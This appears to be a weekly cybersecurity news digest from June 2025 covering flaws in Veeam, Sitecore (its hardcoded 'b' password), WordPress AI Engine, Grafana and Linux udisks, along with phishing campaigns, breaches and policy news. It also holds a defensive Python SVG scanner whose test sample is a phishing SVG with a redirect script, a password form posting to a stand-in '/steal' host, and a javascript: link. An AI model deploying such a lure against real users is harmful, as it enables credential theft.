Cybersecurity News Review - Week 25 (2025)
This week brought major security flaws in Sitecore (hardcoded password "b"), WordPress AI Engine, and Linux systems, while hackers increasingly used SVG attachments for phishing and started focusing on U.S. insurance companies. Critical patches needed across multiple platforms as threat actors evolve their attack methods.
New Veeam RCE flaw lets domain users hack backup servers
Veeam has released security updates for critical vulnerabilities in its Backup & Replication software, including CVE-2025-23121, a remote code execution flaw affecting domain-joined installations that can be exploited by any authenticated domain user. This vulnerability, fixed in version 12.3.2.3617, adds to a series of RCE flaws in VBR that have been actively targeted by ransomware groups such as Frag, Akira, and Fog. Many organizations have made themselves vulnerable by joining backup servers to Windows domains against Veeam's security best practices. VBR servers are particularly attractive targets for threat actors because they can facilitate data theft and prevent recovery by deleting backups before deploying ransomware, making timely patching critical for Veeam's extensive customer base of over 550,000 organizations worldwide.
Over 100,000 WordPress Sites Exposed to Privilege Escalation via MCP AI Engine
A severe security vulnerability identified in the AI Engine WordPress plugin (versions 2.8.0-2.8.3) allows authenticated attackers with subscriber-level access to gain administrative control through privilege escalation, particularly affecting users who enabled the Dev Tools and MCP module. The flaw, designated CVE-2025-5071 with a CVSS score of 8.8, stems from inadequate permission checks that permit logged-in users to execute critical commands like "wp_update_user" even when Bearer Token authentication is implemented. After Wordfence's responsible disclosure on May 21, 2025, developer Jordy Meow promptly released a patch in version 2.8.4 on June 18, which enforces administrator-level capability checks and strengthens authentication processes, with WordPress administrators urged to update immediately.
Is b For Backdoor? Pre-Auth RCE Chain In Sitecore Experience Platform
A critical pre-authentication remote code execution (RCE) chain was discovered in Sitecore Experience Platform affecting versions 10.1 and later. The attack begins with hardcoded credentials for the sitecore\ServicesAPI user, whose password was set to the single letter "b" in the product installer since version 10.1. Attackers can authenticate using these credentials by bypassing permission checks through the /sitecore/admin endpoint rather than the standard login path. Once authenticated, they can achieve RCE either through a ZIP slip path traversal vulnerability in the file upload functionality (allowing webshell upload to the webroot without knowing the full system path) or through an unrestricted file upload in the Sitecore PowerShell Extension. The vulnerabilities affect an estimated 22,000+ exposed Sitecore instances worldwide and demonstrate how enterprise CMS platforms continue to struggle with basic authentication security, with hardcoded credentials being embedded directly in the database seeding process during installation.
Over a Third of Grafana Instances Exposed to XSS Flaw
Security researchers at Ox Security have identified a high-severity vulnerability (CVE-2025-4123) in Grafana, affecting 36% of public-facing instances and numerous internal servers. The flaw, dubbed "the Grafana Ghost," is a cross-site scripting vulnerability that combines client path traversal and open redirect, allowing attackers to execute arbitrary JavaScript through malicious links. When exploited, attackers can change victims' usernames and login emails, reset passwords, and gain unauthorized access to Grafana accounts. This compromises sensitive operational data and could cause significant disruption by locking out legitimate users from critical monitoring systems. Though patched in May, researchers urge DevOps teams to immediately update their installations, as both public and locally-running instances remain vulnerable.
New Linux udisks flaw lets attackers get root on major Linux distros
Two newly discovered Linux vulnerabilities enable local privilege escalation to root access on major distributions. CVE-2025-6018 affects PAM configuration on SUSE systems, while CVE-2025-6019 impacts libblockdev's udisks daemon, which runs by default on most Linux systems. Qualys Threat Research Unit, which discovered both flaws, demonstrated successful exploits on Ubuntu, Debian, Fedora, and openSUSE, emphasizing that the udisks vulnerability poses a "critical, universal risk" requiring immediate patching due to its ubiquity and exploit simplicity. Organizations are urged to patch both vulnerabilities promptly to prevent complete system compromise, as root access enables persistence, lateral movement, and system tampering.
Sneaky Serpentine#Cloud slithers through Cloudflare tunnels
Security researchers at Securonix have discovered an ongoing malware campaign called Serpentine#Cloud that uses Cloudflare tunnel subdomains to deploy stealthy, in-memory malicious code. The widespread attack, targeting victims in Western countries, Singapore, and India, begins with invoice-themed phishing emails containing disguised Windows shortcut files. When clicked, these launch a complex infection chain using batch scripts, VBScript, and Python to ultimately deliver AsyncRAT or Revenge RAT payloads that avoid detection by running entirely in memory. The attackers leverage Cloudflare's legitimate TryCloudflare tunneling services to host and deliver payloads, making their traffic blend with normal network activity while avoiding domain-blocking tools and complicating attribution efforts.
Phishing emails increasingly use SVG attachments to evade detection
Threat actors are increasingly utilizing Scalable Vector Graphics (SVG) attachments in phishing campaigns due to their versatility and ability to evade detection. Unlike pixel-based JPG or PNG files, SVGs use mathematical formulas to create images and can incorporate HTML and JavaScript elements. This capability allows attackers to embed phishing forms that steal credentials, download malware, or redirect users to malicious websites. Security researcher MalwareHunterTeam has identified recent examples demonstrating these techniques, which often display fake Excel spreadsheets with login forms or official-looking documents with download buttons. Because SVGs are primarily text-based, they typically receive minimal detection from security software. Recipients should treat SVG attachments with suspicion and consider deleting emails containing them unless specifically expected in a professional context.
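As an added defender-side illustration (not code from the original article), here is a small Python scanner that flags the SVG features the passage describes: embedded script, HTML smuggled in via foreignObject or form elements, inline event-handler attributes, and javascript: links. The two SVG samples are constructed for the example, and the example.invalid hostnames are placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed samples: a harmless icon and a phishing-style SVG carrying an HTML login form
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""

PHISH_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <script>document.location="https://example.invalid/login"</script>
  <foreignObject width="100%" height="100%">
    <form xmlns="http://www.w3.org/1999/xhtml" action="https://example.invalid/steal">
      <input name="password" type="password"/>
    </form>
  </foreignObject>
  <a xlink:href="javascript:alert(1)"><text x="0" y="0">Download</text></a>
</svg>"""

# Elements that have no business in an image attachment but are typical of SVG phishing lures
RISKY_TAGS = {"script", "foreignobject", "iframe", "embed", "object", "form", "input"}


def local_name(qualified):
    """Strip an ElementTree namespace prefix: '{uri}href' -> 'href'."""
    return qualified.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes):
    """Return a list of human-readable findings; an empty list means nothing suspicious."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Malformed XML is itself worth a look: browsers are far more forgiving than parsers
        return [f"unparseable XML: {exc}"]
    for elem in root.iter():
        name = local_name(elem.tag)
        if name in RISKY_TAGS:
            findings.append(f"element <{name}>")
        for attr, value in elem.attrib.items():
            aname = local_name(attr)
            lowered = value.strip().lower()
            if aname.startswith("on"):  # onload=, onclick=, ... run script without a <script> tag
                findings.append(f"event handler {aname} on <{name}>")
            elif aname == "href" and lowered.startswith("javascript:"):
                findings.append(f"javascript: URI on <{name}>")
            elif name == "a" and aname == "href" and lowered.startswith(("http://", "https://")):
                findings.append(f"external link on <a>: {value}")  # redirect-style lure
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(scan_svg(data))


if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SVG), ("phish", PHISH_SVG)):
        print(label, scan_svg(sample))
```

Run over mail attachments, a non-empty result is a reason to quarantine the message for review rather than deliver it.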
Russian Hackers Bypass Gmail MFA With App-Specific Password Ruse
A Russian government-linked hacking team deployed a sophisticated phishing operation targeting high-profile individuals by impersonating US State Department officials in flawless English correspondence. After establishing trust through multiple exchanges, the hackers instructed victims to create a Google "app-specific password" and share it, bypassing two-factor authentication to gain persistent access to Gmail accounts. The operation, running from April to early June and tracked as UNC6293 (linked to APT29), featured meticulously crafted emails and documents likely polished with AI tools. Google has since revoked stolen passwords, locked affected accounts, and recommends enrolling in Advanced Protection and auditing for application-specific passwords.
AsyncRAT Campaign Continues to Evade Endpoint Detection
Halcyon has uncovered a sophisticated phishing campaign active since early 2024 that bypasses traditional security controls using legitimate services like TryCloudflare to deliver malware such as AsyncRAT. This campaign, likely orchestrated by a new or rebranded cybercriminal group, has affected thousands of organizations across multiple sectors, enabling remote surveillance, credential theft, lateral movement, data exfiltration, and ransomware deployment. The attack chain involves multi-stage execution beginning with phishing emails linking to cloud-hosted files, followed by obfuscated scripts and Python-based malware deployment. Halcyon detected this activity at the initial access stage when it evaded other endpoint protection tools, highlighting the need for layered defenses capable of detecting behavioral anomalies rather than relying solely on signature-based or reputation-based protection.
No, the 16 billion credentials leak is not a new data breach
Bleeping Computer clarifies that the widely reported "16 billion credentials leak" is not a new data breach but rather a compilation of previously leaked credentials gathered from infostealers, past data breaches, and credential stuffing attacks. These stolen credentials have likely been circulating for years before being aggregated into a database that was temporarily exposed online. Rather than panicking, users are advised to follow good cybersecurity practices: scanning devices for malware, using unique passwords for each site, employing password managers, and enabling two-factor authentication through authentication apps instead of SMS.
Telecom giant Viasat breached by China's Salt Typhoon hackers
Viasat, a satellite communications company serving governments and various industries with approximately 189,000 U.S. broadband subscribers, has been breached by China's Salt Typhoon cyber-espionage group. The company discovered the unauthorized access earlier this year and worked with federal authorities on the investigation, claiming the incident has been remediated with no customer impact. This breach follows a previous 2022 attack by Russian hackers and is part of Salt Typhoon's larger campaign targeting telecommunication providers worldwide, including major U.S. companies like AT&T and Verizon, where the group accessed law enforcement wiretapping platforms and communications of U.S. government officials.
Hackers switch to targeting U.S. insurance companies
Google Threat Intelligence Group warns that Scattered Spider hackers are targeting U.S. insurance companies, following their pattern of sector-by-sector attacks. The group, known for sophisticated social engineering, has breached multiple insurance firms, including Philadelphia Insurance Companies and Erie Insurance, which recently experienced system outages. Scattered Spider typically bypasses security through phishing, SIM-swapping, and MFA manipulation before potentially deploying ransomware like RansomHub, Qilin, or DragonForce. Security experts recommend comprehensive visibility across infrastructure, strong authentication practices, identity segregation, and employee education about impersonation attempts to defend against these attacks.
US recovers $225 million of crypto stolen in investment scams
The U.S. Department of Justice has seized over $225 million in cryptocurrency related to investment fraud and money laundering, marking the largest crypto seizure in U.S. Secret Service history. Investigators traced funds stolen from more than 400 victims through blockchain analysis, uncovering a sophisticated laundering network that executed hundreds of thousands of transactions to conceal the illicit source. The operation involved collaboration between the DOJ, FBI, Secret Service, Tether, and TRM Labs, which identified 144 OKX accounts connected to what appears to be an organized fraud ring using Vietnamese documentation. Despite complex obfuscation attempts, investigators successfully mapped the laundering network, allowing Tether to freeze and transfer the equivalent tokens to the government for potential victim restitution.
Police seize Archetyp Market drug marketplace, arrest admin
International law enforcement authorities from six countries successfully dismantled Archetyp Market, a major darknet drug marketplace operating since May 2020. The joint operation, codenamed 'Deep Sentinel,' resulted in the arrest of the 30-year-old German administrator in Spain, along with one moderator and six high-profile vendors in Germany and Sweden. The marketplace had accumulated over 612,000 users, facilitated approximately $289 million in Monero cryptocurrency transactions, and featured more than 3,200 vendors selling various drugs through 17,000 listings. During the operation, authorities seized numerous electronic devices, narcotics, and assets worth €7.8 million, effectively eliminating what Europol's Deputy Executive Director called "one of the dark web's longest-running drug markets."
OpenAI to Help DoD With Cyber Defense Under New $200 Million Contract
OpenAI has launched "OpenAI for Government" and received a $200 million contract from the US Department of Defense to enhance AI capabilities, particularly for cyber defense. The pilot program with the DoD's Chief Digital and Artificial Intelligence Office aims to transform administrative operations, improve healthcare for service members and families, streamline program data analysis, and support proactive cyber defense. OpenAI emphasized that all applications must comply with their usage policies, while the DoD stated the funding will develop prototype frontier AI capabilities for national security challenges in both warfighting and enterprise domains. Industry experts view this partnership as practical, given the rapid advancement of AI technology and the government's need to leverage external expertise rather than building capabilities internally.
UK Government Publishes Plan to Boost Cyber Sector Growth
The UK government has launched a Cyber Growth Action Plan to enhance national cyber resilience following recent high-profile attacks on retailers. Led by experts from Bristol University and Imperial College London, the plan will assess cyber goods and services markets and explore emerging technologies like AI and quantum computing. The government is investing £16m in existing programs: £10m for CyberASAP to help academics commercialize research, aiming to create 25 new spin-out companies by 2030, and £6m for Cyber Runway to support cybersecurity startups. This initiative follows costly cyber attacks on major UK retailers, including Marks & Spencer, which Chancellor Pat McFadden described as a "wake-up call," and will inform the forthcoming National Cyber Strategy and Cyber Security and Resilience Bill.
Subscribe and come back next week to get another quick overview of recent industry events. Did I miss any news that you found useful from this week? Please add them to the comment section.